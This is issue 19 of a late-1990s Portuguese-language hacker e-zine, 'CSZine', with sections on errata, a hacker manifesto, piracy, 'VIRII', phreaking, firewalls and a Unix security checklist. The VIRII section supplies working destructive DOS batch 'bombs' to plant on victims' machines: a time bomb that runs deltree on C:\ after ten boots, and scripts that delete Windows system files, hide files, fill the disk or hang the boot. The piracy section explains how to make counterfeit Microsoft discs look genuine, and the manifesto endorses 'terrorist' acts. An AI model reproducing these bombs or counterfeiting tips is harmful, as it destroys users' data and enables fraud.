Cszine 19
zZZZZZZZZZZZZZZZZZZZZZZZZ
zZ
zZ
zZ
zZ
zZ
CCCCCCCCCCCCCCCC zZ SSSSSSSSSSSSSSSS
CCCCCCCCCCCCCCCCC zZ SSSSSSSSSSSSSSSSS
CCCCCCCCCCCCCCCCCC zZ SSSSSSSSSSSSSSSSSS
CCCCCC CCCCC zZ SSSSSS SSSSS
CCCCCCC zZ SSSSSSS
CCCCCCCC zZ SSSSSSSSSSSSSSSSSSSSS
CCCCCCCC zZ SSSSSSSSSSSSSSSSSSSSS
CCCCCCC zZ SSSSSSS
CCCCCC CCCCC SSSSS SSSSSS
CCCCCCCCCCCCCCCCCC SSSSSSSSSSSSSSSSSS
CCCCCCCCCCCCCCCCC SSSSSSSSSSSSSSSSS
CCCCCCCCCCCCCCCC SSSSSSSSSSSSSSSS
zZ
zZ
zZ
zZ
zZ
zZZZZZZZZZZZZZZZZZZZZZZZZine
by Cheat Struck
Belo visual naum?
UIN da revista : 16623675
Canal da revista : #CSCHANNEL no irc.via-rs.com.br
E-Mail da revista : cszine@hotmail.com
Memoserv da revista: /msg memoserv send Struck <msg>
(Soh no via-rs)
Page da revista : http://members.xoom.com/cszine
Introdução
Estamos quase completando a segunda dezena da zine. Vamos ver... pelos meus calculos eu começei com a zine em julho, então logo vamos completar 20 ediçıes em 4 meses. Isso quer dizer que a zine ehhh.. semanal?? naum, mais do que isso. Acho que sai de 5 por mes.
Bacana neh. Tem vezes que eu me descuido e coloco as 2 ultimas ediçıes num soh dia. hmmm.. o index.htm da page não estah sendo atualizado pq eu sei que quem entra não tah nem ai para o pensamento do dia. As unicas paginas que serão atualizadas são links.htm, cszine.htm(2x por semana), others.htm e progs.htm o resto e' pouco provavel.
Gostaria de me desculpar com o VooDoo(nukei ele sem saber quem era). Vou explicar pra vcs oque aconteceu.. O voodoo entrou com outro nick na viars e me deu um version. Pra mim quando chega um kra q eu naum conheço, dando version ou quer chamar os outros de lamah por tarem usando Win95 ou quer dar flood. Ae eu me equivoquei e nukei ele. Mas jah fiz as pazes com ele.
VERSION não eh proibido. Mas não faça isso com todo mundo ou isso pode acontecer com vc tb.
Foi mal VooDoo.
Indice
Seção: Materia: Assunto: Autor: Nota:
1. Erratas Erros jah cometidos Cheat Struck 10,0
2. Manifesto Count Down Manifesto PEST 9,5
3. Programação Fuck Protetion Cheat Struck 9,0
4. Pirataria Microsoft Suckz Cheat Struck 10,0
5. VIRII BAD COM's e Bombas Cheat Struck 9,5
6. Phreaking Boxes em fase de testes Cheat Struck 10,0
7. Redes FireWalls Anonymous 8,5
8. Invasão de privacidade Lista de segurança Pangéia LTDA. 10,0
9. Hack, the Art Hack Tinks Cheat Struck 9,5
10. °°°BoNuS!!! Lista de provedores Cheat Struck 10,0
1. Erratas
Erros em ediçıes passadas
***Edição numero 01***
O provedor ginet mostrado nessa edição, adquiriu um sistema de proteção mais phoda de se hackear.
***Edição numero 04***
A lista de pesquisa hacking mostrada nessa edição e' a versão 1.1 e não 1.0.
***Edição numero 05***
A materia publicada na seção invasão de privacidade contém alguns dados incorretos, jah corrigidas na edição passada. Nesta mesma seção aparecem 2 servidores WIN que jah não existem mais.
Na seção preview esta' previsto uma "Lista de provedores e endereços ftp do BRASIL" coisa que eu pensei em fazer mas nunca saiu.
***Edição numero 08***
Na seção "Hack, the Art" repetiu a materia publicada na edição 06.
***Edição numero 09***
Erro pequeno: No indice não foi publicado o assunto, autor e nota da seção "Preview".
***Edição numero 10***
Na seção "IRC TIPS", o meio de dar telnet por uma porta qquer não e': telnet {url/ip}:{porta} {terminal} e sim: telnet {url/ip} {porta} {terminal}
Na seção "Programação" ficou faltando algumas coisinhas:
##### if #####
Você sabe pra que que serve naum eh??
Ex1:
if [ $1x = x ]; then
#conteudo caso não exista a variavel 1(primeiro sub comando)
fi
Ex2:
if [ "$1" = '-?' ]; then
#conteudo se o subcomando for -?
fi
Tipo..No exemplo2 se o cara digitar "./look -?" aparecerá o conteudo entre o if e fi. Sendo que "look" é o nome do script.
##### function #####
Estabelece uma função para ser usada no script.
Ex:
function inicio{
#conteudo
}
inicio
##### Usando variaveis #####
Facil, facil..
Ex1:
nome = "Julio"
echo "Seu nome é : $nome
=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--=-==-
***Edição Numero 14***
Na seção "Hack, the Art" existe uma materia(Bloqueando um servidor de IRC) que está incorreta. Essa materia foi corrigida na edição 15.
***Edição Numero 15***
Alí no guia de ediçıes da CSZine, na edição numero 02, seção 6 ("FAQ sobre sniffer") naum foi escrito por mim e sim por Christopher William Klaus da Internet Security Systems, Inc.
***Edição Numero 16***
Ficou faltando a pagina 008 do boletim de segurança da Pangéia.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=
Boletim 008/97 da Lista de Segurança da Pangéia Informática
30 de Março de 1997
Tópico: Vulnerabilidade em clientes ftp antigos
Foi verificada uma vulnerabilidade na seguinte versão do cliente ftp, que acompanha várias distribuiçıes Linux:
/bin/ftp:
$Id: ftp.c,v 1.1 1994/05/23 09:03:41 rzsfl Exp rzsfl $
$Id: cmds.c,v 1.1 1994/05/23 09:03:41 rzsfl Exp rzsfl $
$Id: cmdtab.c,v 1.1 1994/05/23 09:03:41 rzsfl Exp rzsfl $
$Id: domacro.c,v 1.2 1993/08/01 18:15:29 mycroft Exp $
$Id: glob.c,v 1.1 1994/05/23 09:03:42 rzsfl Exp rzsfl $
$Id: main.c,v 1.1 1994/05/23 09:03:42 rzsfl Exp rzsfl $
$Id: ruserpass.c,v 1.1 1994/08/17 13:52:59 florian Exp florian $
Esta vulnerabilidade permite a um usuário local ter acesso senhas de outros usuários usadas em sistemas locais e remotos.
1. Descrição
Foi verificado que a versão do ftp acima, em determinadas circunstancias gera um arquivo 'core' contendo a senha (em claro, não criptografada) que o usário usou para conectar-se a um ftp servidor qualquer.
2. Impacto:
Esta característica pode permitir a um usuário comum ter acesso a senhas de outros usuários, por exemplo se o arquivo "core" for gerado em um diretório público.
3. Solução:
Instalar o ftp cliente que acompanha o pacote NetKit-0.09, ou equivalente, contendo a seguinte identificação ou mais recente.
/bin/ftp:
$Id: cmds.c,v 1.15 1996/12/31 19:15:36 dholland Exp $
$Id: cmdtab.c,v 1.5 1996/08/19 20:24:44 dholland Exp $
$Id: domacro.c,v 1.4 1996/08/14 23:27:28 dholland Exp $
$Id: ftp.c,v 1.13 1996/11/25 18:42:46 dholland Exp $
$Id: glob.c,v 1.5 1996/08/14 23:27:28 dholland Exp $
$Id: main.c,v 1.11 1996/08/30 21:05:57 dholland Exp $
$Id: ruserpass.c,v 1.3 1996/08/14 23:27:28 dholland Exp $
O pacote NetKit-0.09 está disponível também em: ftp://ftp.pangeia.com.br/pub/seg/NetKit-0.09.tar.gz
4. Informaçıes adicionais:
http://www.pangeia.com.br/faq.html
nelson@pangeia.com.br
5. Agradecimentos:
Klaus Steding-Jessen (jessen@ahand.unicamp.br)
Pedro Vazquez (vazquez@iqm.unicamp.br)
1995-98 © Pangéia Informática LTDA.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Soh isso galera
2. Manifesto
Count Down Manifesto
MANIFESTO
Irei comecar dizendo o nosso proposito, mostrando a voces as nossas ideias e razoes. Hoje eu designado como a PEST estou aqui para lhes dizer que a uniao traz o PODER e que com o poder poderemos melhorar este mundo.
Nao com a forca, mas com a organizacao do sistema. Quero lhes dizer que voces que se consideram um verdadeiro Hacker nao sao NADA. Nao passam de pessoas que por terem um determinado conhecimento sao nomeados de ladroes, que alegram-se em obter alguns senhas e sao esquecidos como uma gripe que veio e se foi. Algo pequeno que nao deve nem ser conciderado grandioso, mas sim criminoso. Quem sao os hackers, o que eh ser hacker?
LADROES? Entao devem ser presos e encarcerados, sao marginais. Eh assim que penssam as pessoas lah fora. E voce tem orgulho de ser ladrao? Tem orgulho de ser apenas um marginal que deve ser tratado como os que vendem drogas e matam? Hackers ou sao ladroes geralmente de 15 ah 1... anos ou sao mera FICCAO. Eh assim que penssam a maioria dos ignorantes deste mundo de lamentacoes e rangeres de dentes. Precisamos mudar isso! Como faremos? Nos unindo e fazendo o que fazemos melhor. Fucar! Nao estou pedindo que facam clubinhos, isso eh coisa de SPRITDOWNS que se divertem jogando virus nos computadores dos colegas. Estou pedindo que deixem de ser meros hackers para serem os comvocados pela VOZ do TROVAO, para serem OS ARCANJOS. Sim, pessoas que trabalharao como uma corrente, trocando conhecimentos e ideias. Para o bem comum. Estou pedindo que facam parte de uma IRMANDADE, cujo objetivo eh "aparecer" defendendo causas verdadeiras e de ser reconhecida nao como ladroes ou mera ficcao, mas como as lagrimas de DEUS, COMO o suspiro da NATUREZA e o grito dos JUSTOS. Voce pode esta rindo deste texto, achando um exagero ou uma alucinacao. Entao, meu caro irmao, saia da frente de seu monitor SVGA de 16000000de cores e veja o mundo em que voce coexiste com a sua carcassa. Olhe para os olhos daquelas criancas que pedem PELO AMOR DE DEUS NAO DEIXEM EU MORRER DE FOME. E o que eles ganham eh um NAO seguido de um olhar de desprezo e fechar de janela. Entao este ser "insignificante" segue o seu percursso em direcao a MORTE. A pest CHORA! O mundo do futuro eh um mundo controlado pelas maquinas, e quem controla as maquinas controlara o mundo. Este eh o nosso objetivo? Nao! O nosso objetivo eh justica, justica por aqueles que perecem na miseria e na escuridao. Eles lutam lah fora pela LIBERDADE e o direito de VIVER. E nos os 4 cavaleiros do apocalipse com os seus seguidores, os ARCANJOS, mostrarao os seus manifestos aqui na REDE.
Juntando os seus conhecimentos e alma em um movimento solido. Estamos em um mundo onde quem consome VALE +. E quem nao vale, deve ser conssumado. Precisamos mudar isso nem que tenhamos de realizar atos talvez considerados "terroristas". Voces nao devem ter percebido mas o CAOS chegou, a nova ERA eh agora. Os 4 cavaleiros com seus cavalos e espadas pairam sobre as nossas cabecas. Facamos unidos os nossos conhecimentos, a LEI; os teclados as nossas ESPADAS. Mostrando a todos os nossos pensamento. Pois a VOZ do TROVAO disse "Eu virei como ladrao na noite". Temos o nosso campo de batalha, A REDE. Temos as nossas armas, O MODEM, TECLADO... Temos as nossas bocas, IRC, HOMEPAGES, ZINES... E temos as nossas rasoes, O CAOS ou a ORDEM. E os 4 cavaleiros com seus cavalos empunhando suas espadas e seguidos pelo seu exercito, OS ARCANJOS, estao no CYBERWORLD para ajudar a JUSTICA e a RASAO.
Manifesto de Eethernal-Pest contra o preconceito a nos e os pobres de capital.
Siga seu caminho
3. Programação
Sistemas de proteçıes
Tipo o publicado semana passada.
Porém aki vc não precisará adicionar uma conta nova. Apenas adicione esta linha no /etc/hosts.denny.
in.telnetd: ALL: twist /bin/fuck
Agora coloque este arquivo no diretório /bin e prounto!
Deixa eu explica como funciona. Quando um usuario desconhecido se logar ao seu sistema, ele abrira' esse programa e ficara' se achando o hacker pois acessou um login de destruição do sistema(hehehe, foda neh). Usuario desconhecido eu me refiro a akeles que não tem permição de usar o telnet do seu sistema(os que não estão no hosts.allow).
E' hilario vê a cara do palhaço que fica achando que tah destruindo o seu sistema. Pena que não tem como tu ver o babaca.
----------------------------Corte Aki---(fuck)-------------------------------
#
# Fuck Protetion by Cheat Struck / CopyRight Æ CSS 1997 - 98
#
# Se tiver afim de poupar uns miseros bytes, pode retirar estes comentarios.
# Se quizer quebrar o CopyRight, faça-o e me diga como colocou este programa
# nos sistemas do Pentagono.
# Se você e' muito Lamer, nao aconselho o uso deste programa a menos que vc
# tenha consiencia do que esta' fazendo.
#
function inicio {
echo " "
echo "RedHat Linux 4.1 (Cheat Struck)"
echo "Kernel 2.0.24"
echo " "
echo -e "Login:"'\c'
read login
sleep 1
echo -e $login " Passwd:"'\c'
read pass
sleep 1
echo " "
echo "Login Incorrect"
echo " "
echo -e "Login:"'\c'
read login
sleep 1
echo -e $login " Passwd:"'\c'
read pass
sleep 1
destruir
}
function destruir {
echo " "
echo " Special Function Login Activated"
echo -e "Re-enter Passwd:"'\c'
read pass1
sleep 1
if [ $pass = $pass1 ]; then
echo " "
echo "Destruction System Function Activated"
echo "Login = " $login " - OK"
echo "Passwd = " $pass " - OK"
echo "Repasswd = " $pass1 " - OK"
sleep 1
echo -e "System Crush."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 1
echo -e "."'\c'
sleep 5
clear
exit
fi
clear
inicio
}
inicio
-----------------------------------------------------------------------------
Depois disso, se vc pudesse ouvir uma unica palavra do kra que tentou entrar, seria "UAU!".
Nas próximas ediçıes publicarei mais scripts shells em quanto não chega mais gente pra escrever tutoriais ou programas.
4. Pirataria
Microsoft Suckz
Alguns contratos assinados por Bill Gates:
- EULA: O EULA é o contrato relativo ao uso que você faz do produto licencia do e lhe concede um direito específico de uso do software Microsoft em seu computador. Qualquer cópia não licenciada pelo EULA (Contrato de Licença de Usuário Final) é considerada uma violação nos direitos autorais, a não ser no caso desta ser liberada pelo proprietário ou pelo MLP.
- MLP: O MLP (Microsoft License Pack) é um contrato que autoriza a realização de uma ou mais cópias de determinado produto Microsoft. Por exemplo, se você trabalha em uma pequena empresa com dois computadores e preci sa usar o Microsoft Word nos dois computadores, pode comprar uma única cópia do Microsoft Word e um MLP de uma única cópia para o Word.
Da pra acreditar no que diz esses contratos??
Se você não entendeu bem as besteiras que eles estabelecem, Aqui vai um exemplo:
Se você comprou um Windows 3.1 e depois de 2 anos decidiu atualiza-lo para o Windows95, você ainda deve conservar o antigo produto como parte dessa unidade de software. Ou seja: você deve guardar a cópia do Windows 3.1 como parte do seu produto adquirido legalmente.
Putz! Soh pq vc tinha o Windows 3.1 não poderá revende-lo ou apenas jogar no lixo. Você tem que ficar com ele para não estar violando a lei. Que baita merda heim?
O que é pirataria de software?
A pirataria de software consiste na cópia não autorizada de softwares protegidos por leis de direitos autorais. Em média, para cada cópia autorizada de software, é feita pelo menos uma cópia pirata.
Pirateando...
Há cinco formas básicas de pirataria de software:
- Cópia pirata: Ocorre quando são feitas cópias extras de um programa dentro de uma organização, para uso dos funcionários. A "troca de discos" entre amigos e colegas fora de um ambiente de trabalho está também incluída nesta categoria.
- Cópia pirata pré-instalada: Alguns revendedores de computador carregam cópias piratas nos discos rígidos dos computadores que colocam ‡ venda, como incentivo para o usuário final na compra de um computador desse determinado revendedor.
- Falsificação: … a duplicação e venda ilegal de software protegido por direitos autorais, geralmente em uma forma destinada a fazer com que o produto pareça legítimo. A falsificação de software pode ser muito sofisticada, incluindo esforços consideráveis para imitar embalagem,logomarcas e técnicas anti-falsificação ,como hologramas. Pode também ser mais rudimentar,consistindo em rótulos de qualidade inferior ou escritos ‡ mão, com os discos embrulhados num saco plástico e vendidos nas esquinas.
- Pirataria em BBSs: Esta forma de pirataria ocorre quando um software protegido por direitos autorais é carregado remotamente por usuários conectados via modem a uma BBS pública ou semiprivada. Isto não deve ser confundido com o fornecimento de Sharewares. Qualquer software Microsoft não autorizado, disponível através de uma BBS, deve ser considerado ilegal.
- Aluguel de Software: … onde o software é "alugado" ilegalmente a usuários que o copiam no disco rígido de seus computadores e, em seguida, devolvem a cópia a quem a alugou.
Cuidados a tomar quando se pirateia um produto Microsoft..
- Tomar o cuidado de não deixar marcas comerciais de outras impresas a não ser a Microsoft.
- Cuidar ao imprimir a frente do CD pirata de um sistema operacional. Sempre deve ter a mensagem "Distribuido somente com um computador novo" ou algo do gênero.
- Colocar o contrato de licença de usuário final (EULA).
- Colocar o cartão de registro do produto.
- Colocar o Certificado de Autenticidade.
- Colocar um mecanismo de requisição (como um cartão-resposta).
- Colocar discos de backup, manuais, cartão de registro, EULA e/ou Certificado de Autenticidade contendo um holograma contra pirataria e rótulo de confirmação para o software de sistema pré-instalado, que inclui um pacote do produto dentro da caixa do computador. Os pacotes de produtos devem conter todos esses elementos.
- Os discos de backup nunca devem contêr rótulos escritos ‡ mão, não embalados adequadamente e/ou parecerem ser de qualidade inferior.
- O(s) manual(ais) não devem ser fotocopiados, não embalados adequadamente e/ou ter impressão de má qualidade.
Pirateando Discos DMF (Dos Model Format)
A Microsoft, quando lançou o Windows 95, deve ter achado que o formato DMF(Dos Model Format) ia ser um grande problema para nós, mas como sempre estavam errados.
Para piratiar discos com formato DMF cluster 2048 (1.716.224 mb), vc deve adquirir programas ilegais. Porém existem também muitos outros legais, podemos citar por exemplo o VGAcopy, Win Image 95, e 2mGUI versão1.9, entre muitos outros ai no mercado.
O melhor segundo meu respeito é o 2mGUI v1.9 que tem a incrível capacidade de formatar um disco de (1.457.664 mb) em (2.221.858 mb), este programa é simplesmente longe dos limites, quanto aos outros, eles fazem o necessário para uma boa pirataria.
5. VIRII
BAD COM
Vou explicar claramente o que são BAD COMs..
Crie o diretorio \TESTE e copie os arquivo \WINDOWS\COMMAND\edit.com e debug.exe. Agora crie o arquivo test.bat com o seguinte conteudo:
-----------------------------Corte Aki--(test.bat)---------------------------
@echo off
echo test.bat
-----------------------------------------------------------------------------
Note que os 3 tipos de arquivos executados em DOS foram incluidos nesse diretório(.EXE, .COM e .BAT). Então vamos dar o mesmo nome a eles. Digite "ren *.* test.*".
De um DIR para ver como estão os arquivos. Aparecerá +/- assim:
C:\TESTE> dir
O número de série do volume é XXXX-XXXX
Diretório de C:\TESTE
. <DIR> 25/06/98 3:57 .
.. <DIR> 25/06/98 3:57 ..
TEST COM 21.002 24/08/95 9:50 test.com
TEST EXE 70.830 24/08/95 9:50 test.exe
TEST BAT 16 02/01/00 10:34 test.bat
3 arquivo(s) 91.838 bytes
2 diretório(s) 564.609.024 bytes livres
Agora execute o programa TEST. Qual?? Apenas digite TEST e veja qual será executado. Não vou fazer misterio. O edit.com sera' executado. Delete-o desse diretório e digite TEST novamente e o debug.exe sera' executado.
Notou a sequencia???
Os primeiros arquivos a serem executados são os .COM .
Os segundos são os .EXEs .
E por fim os .BATs .
Então os BAD-COMs consistem em enganar a shell, fazendo-a executar o programa .COM antes do .EXE . Tipo.. Existe um arquivo no seu disquete chamado install.exe mas existe tb um bad-com num path(exemplo: \WINDOWS) chamado install.com . Então quando vc digitar install, ao invés de ser executado o programa de instalação do disquete, será executado o bad-com.
Bombas .BAT
A outras maneiras de se enganar a shell, sem precisar colocar arquivos .COM (Isso e' bem requerido para lamers).
E' bem moleza.
Você sabe alguns comandos malignos de DOS naum sabe??? Tipo.. deltree, format, .. Se nem isso vc sabe, de uma lida na seção de programação lah da edição 00.
Então faça um arquivo .bat tipo bomba. Se não tem capacidade nem pra fazer isso pegue este exemplo os exemplos a seguir.
Depois de ter feito a bomba nomeie-as como:
WIN.BAT
E coloque no diretório raiz. Ae quando o cara quizer voltar para o windows e estiver na raiz. Ele digitará "win". Então sera' executado esta bomba.
Aki vai um exemplo de bomba a ser colocada no Win.bat.
-----------------------------Corte Aki--(WIN.BAT)----------------------------
@echo off
deltree /y c:/windows/system
del c:/windows/win.ini
del c:/windows/system.ini
c:\windows\win.com
-----------------------------------------------------------------------------
AUTOEXEC.BAT
E coloque-o na raiz. Ae sempre que iniciar o sistema, a bomba sera' executada. Essa bomba exemplo enchera' o HD do babaca de porcaria sempre que ele iniciar o computador.
---------------------------Corte Aki--(AUTOEXEC.BAT)-------------------------
@echo off
dir /s C:\ >> C:\Windows\System\VBRUN101.DLL
-----------------------------------------------------------------------------
Quer Arquivo
Essa e' legal. Vou colocar exemplos apenas aki tah bem. Se não entender eu não vou ficar explicando.
Esta bomba deixara' todos os arquivos do diretório WINDOWS invisiveis e o dono pensara que foram deletados mesmo o windows executando normalmente. Coloque esta' bomba na raiz.
----------------------------Corte Aki--(HIDE.BAT)----------------------------
@echo off
attrib +H C:\Windows\* /S
-----------------------------------------------------------------------------
Agora faremos que quando o usuario digitar o comando cls, a bomba seja executada. Para isso precisaremos adicionar essas linhas no autoexec.bat.
---------------------------Corte Aki--(AUTOEXEC.BAT)-------------------------
@echo off
doskey cls c:\hide.bat
-----------------------------------------------------------------------------
Outras Bombas
Bomba relógio. E' bem simples de se entender se tiver um pouquinho de conhecimento sobre .BATs. Deve ser colocado no lugar do AUTOEXEC.BAT .
Essa bomba conta 10 inicializaçıes do computador, então acaba com o HD do palhaço.
------------------------------Corte Aki--(AUTOEXEC.BAT)----------------------
@echo off
cls
:1
if exist c:\windows\system\a1.dll goto 2
echo 1111 > c:\windows\system\a1.dll
goto fim
:2
if exist c:\windows\system\a2.dll goto 3
echo 1111 > c:\windows\system\a2.dll
goto fim
:3
if exist c:\windows\system\a3.dll goto 4
echo 1111 > c:\windows\system\a3.dll
goto fim
:4
if exist c:\windows\system\a4.dll goto 5
echo 1111 > c:\windows\system\a4.dll
goto fim
:5
if exist c:\windows\system\a5.dll goto 6
echo 1111 > c:\windows\system\a5.dll
goto fim
:6
if exist c:\windows\system\a6.dll goto 7
echo 1111 > c:\windows\system\a6.dll
goto fim
:7
if exist c:\windows\system\a7.dll goto 8
echo 1111 > c:\windows\system\a7.dll
goto fim
:8
if exist c:\windows\system\a8.dll goto 9
echo 1111 > c:\windows\system\a8.dll
goto fim
:9
if exist c:\windows\system\a9.dll goto 10
echo 1111 > c:\windows\system\a9.dll
goto fim
:10
deltree /y c:\ > null
:fim
echo.
-----------------------------------------------------------------------------
Travando a maquina.
Hehehe. Primeiro crie um arquivo de texto qquer e nomeie-o com a extenção .EXE . Exemplo: echo besteiras > c:\windows\init.exe
Depois inclua a seguinte bomba no config.sys:
----------------------------Corte Aki--(CONFIG.SYS)--------------------------
DEVICE=C:\WINDOWS\INIT.EXE
-----------------------------------------------------------------------------
6. Phreaking
Boxes em fase de testes.
Na edição passada mostrei uma box teorisada e testada por mim. Nessa edição vão apenas uns planos que eu ainda não testei.
^^^^^^^^^^Sound Box^^^^^^^^^^
Jah reparou nos fios que ligam o aparelho de som as caixas de som??
Um fio preto e um vermelho. Jah tentou liga-los com os fios da linha telefonica?? Eu tb não.
Mas jah pensou se funcionar?? Você coloca o som tri altão começa a falar com o kra pelo microfone e ateh da pra rolar uma musiquinha com qualidade pro kra ouvir.
E' bacaninha essa box. Soh não sei se funcionara pois os fios do som são bem mais grossos que os do telefone mas...
^^^^^^^^^^Sound Box 2^^^^^^^^^^
Tah, talvez com as caixas de som não funcionem, mas jah vio a finura dos fios da caixa de som do computador??
Faça a mesma coisa que vc fez com a "Sound Box 1".
Tb tente com os fios do microfone, tanto do computador quanto o do aparelho de som.
^^^^^^^^^^Driver Box^^^^^^^^^^
Assim..
Segundo Tom Waits o telefone quando uma chamada e' completada, a polarisação do telefone e' mudada de -48 para +48 volts. Quando o aparelho percebe que a polarisação esta' a +48 volts ele pede uma ficha.
Se vc colocar um diodo nos fios telefonicos, a polarisação fica estavel a 0 volts. Sendo assim, não se encontra positiva então o aparelho não irá requerer mais fichas.
Mas ateh onde foi explicado, o aparelho só ira cobrar quando a polarisaça chegar a +48.
Entaum reparei que num dakeles carrinhos de controle remoto, meio antigos(com um fio ligando o controle ao carro), usava o mesmo padrão de fios telefonicos dos EUA.
O que eu tenho aki é um modelo AUTO DRIVER da GLASSLITE, que precisa de 3 pilhas medias para funcionar.
Cada pilha pode gerar 1,5 volts. Sendo assim 4,5 ao total.
Não sei ao certo, se vc ligar os fios vermelhos e verdes e dar tipo uma partida no controle remoto, se a polarisação ira' subir mais 9 volts ou irá se estabilizar em 9 volts.
Se a segunda opção acontecer, o aparelho tb não necesitara' + fichas, pq não atingiu os +48 volts. O aparelho pensara que esta' no estagio em que a polarisação estara subindo.
Se a primeira estiver correta, a ligação ira' acabar dentro de umas 10 partidas do controle remoto.
7. Redes
FireWalls (por Anonymous)
O que é um Firewall ?
Um firewall é um dispositivo de rede qualquer, que pode ser um computador ou um roteador que filtra o acesso a um rede de computadores que deve ser protegida.
Este muro de fogo permite você proteger a rede de sua empresa da intrusão de seres extra-terrestres não desejados. Ao mesmo tempo que permite que pessoas comuns, que batalham o mês inteiro para ganhar um misero salário, tenham acesso aos serviços da internet, tais como Web e email a partir de dentro da empresa. Eles também podem ser utilizados para realizar um controle (contabilidade) de acessos para permitir que somente certas pessoas da organização tenham acesso aos dados a partir da internet. Muitos firewalls contêm agora características para controlar, autenticar e asegurar o usuário que quer acessar os dados internos da empresa a partir da Internet ou de alguma subsidiária,este tipo de serviços estão se tornando cada vez mais necessários.
Os firewalls estão sendo utilizados em muitas organizaçıes, não somente aquelas com conexão Internet, eles podem ser utilizados para proteger mainframes ou outros recursos centralizados dentro da própria organização, ou ainda, para garantir a segurança das informaçıes que passam através de redes públicas.
8. Invasão de privacidade
Lista de itens de segurança que devem ser observados
Copyright 1994-1997 Pangéia Informática Ltda
A seguinte lista tem por objetivo auxiliar os adminstradores de sistema a manter a segurança de suas instalaçıes em um nível aceitável. Ela se propoe a servir como base para o adminstrador montar sua própria lista.
Este documento pode ser distribuido gratuitamente, desde que mantidos os devidos créditos.
[Planejamento]
[Usuários/Senhas]
[Root]
[Sistema de Arquivos]
[Contas de Usuários]
[Dados]
[Arquivos de logs]
[Ameaças]
[Ameaças via Rede]
[Segurança em Roteadores]
*** Planejamento: ***
- Identifique o que você precisa protejer
- Escolha as prioridades pra segurança
- Especifique normas para emergencias
- Eduque seus usuários
*** Usuários/Senhas ***
- Certifique-se que cada usuário tenha uma conta individual
- Confirme se cada usuário possui senha
- Verifique se sua instalação pode rejeitar senhas com menos de 6 caracteres
- Consiga e rode programas que tentam achar senhas frágeis (Crack, Cracklib).
- Considere a possibilidade de usar programas que geram senhas.
- Nunca transmita senhas por telefone ou e-mail.
- Certifique-se que o arquivo de senhas só pode ser lido pelo "root".
- Considere a possibilidade de trocar as senhas em intervalos regulares.
*** Root ***
- Iniba a entrada do root de qualquer terminal(deixe, no máximo, a console).
- Entre com sua conta comum e então use "su" para tornar-se "root".
*** Sistema de Arquivos ***
- Procure por programas que tenham SUID/SGID ligados.
- Procure por arquivos com permissão para gravação, que são disparados por alguma ferramenta específica (.exrc, .profile, .pinerc, .kshrc, .login, /etc/sendmail.cf, /etc/profile, etc)
*** Contas de Usuários ***
- Remova contas inativas.
- Use rksh ou rsh quando necessário.
- Certifique-se que todas as contas tem senha.
- Evite criar contas pra rodar um único programa.
- Jamais crie outras contas com id 0 (mesmo do root).
*** Dados ***
- Faça cópias de segurança regularmente.
- Certifique-se que as cópias poderão ser recuperadas numa emergência.
- Use mecanismos de veficação de integridade de programas e arquivos. (por exemplo checksum md4/5 ou pdf)
- Certifique-se que os sistemas de arquivos tem as permissıes corretas.
- Não habilite SUID/SGID em scripts (shell ou perl)
- Elimine as permissıes de gravação nos "devices" dos terminais, "pseudo terminais" principalmente.
- Certifique-se que os arquivos começados com "." não tem permissão pra gravação por ninguem.
- Remova todos os shells (csh, zsh, ash, etcsh) que não estiver usando.
- Considere rodar regularmente programas que identificam falhas de segurança no Unix, tais como COPS, Tiger, Medusa, etc.
- Guarde uma listagem dos programas que tem SUID/SGID e compare-a com cada nova verificação.
- Remova TODOS os utilitários que não forem necessários na máquina, tais como: cc, perl, awk, etc.
*** Arquivos de Logs ***
- Rode o comando "last" e "who /var/adm/wtmp" regularmente.
- Verifique os arquivos de auditoria regularmente
- Verifique o arquivo sulog.
- Verifique os arquivo gerados pelos Daemos com: xferlog( ftpd), syslog (syslogd) messages (syslogd) access_log (httpd)
OBS: /etc/syslog.conf permite uma grande varideade de possibilidades de log, e de arquivos para contê-los
*** Ameaças ***
- Nunca instale software desconhecido, sem os fontes para exame.
- Evite usar scripts com SUID/SGID, examine data e permissıes.
- Jamais coloque "." na variável de ambiente PATH do "root".
- Verifique periodicamente os arquivos de rc e data de modificação de programas.
- Examine a variável de ambiente PATH de todos os scripts que for executar.
- Garanta que nenhum programa com SUID/SGID permita saída para o shell.
- Examine os programas que permitem passar o usuário com parâmetro.
*** Ameaças via Rede ***
- Examine o /etc/hosts.equiv e todos os .rhosts, caso você deseje usar os comandos "r" (rlogin, remsh (rsh), rexec, rcp, retc :-)). NOTA: este recurso é altamente condenado, no aspecto segurança.
- Desabilite TODOS os recursos de rede que N√O estiver usando.
- Substitua (se quiser manter habilitado) o fingerd, por uma versão segura.
- Verifique (e instale) a versão mais recente do Sendmail.
- Desabilite, se possível, o serviço de TFTP. (Candidato a serviço mais inseguro)
- Certifique-se que a versão do FTP anonymous é segura.
- Jamais coloque o mesmo arquivo /etc/passwd no diretório do ftp anonymous.
- Jamais crie diretórios cujo dono seja o usuário "ftp" (serviço FTP).
- Desabilite o serviço de NFS para maquinas remotas.
- Desabilite os servicos internos (chargen, echo, etc).
- Use um POPD que tenha arquivo de senhas próprio, ou ao menos permita desconexão após n (poucas) tentativas.
- Remova o programa phf do diretório .../httpd/cgi-bin. (serviço http).
- Remova também os programas test-cgi e nph-test-cgi diretório .../httpd/ cgi-bin. (serviço http).
- Jamais coloque algum interpretador (perl, csh, ksh, etc) no diretório .../httpd/cgi-bin (serviço http).
- Não crie links que usem o perl ou shell para disparar programas.
*** Segurança em Roteadores ***
- Troque ou cadastre uma senha no roteador antes de ligado definitivamente `a Internet, seguindo as mesmas regras para senhas de usuário.
- Desabilite, se possível, o acesso remoto ao 'login' do roteador.
- Desabilite os servicos internos (chargen, echo, etc).
- No caso de roteadores Cyclades, troque não só a senha de fábrica como também o nome do superusuário.
- Desabilite todos os protocolos desnecessários (RIP, BGP, etc).
---------------------------------
Ultima Atualização 29/12/97 - Nelson Murilo (nelson@pangeia.com.br)
Comentários para suporte@pangeia.com.br
NOTA:
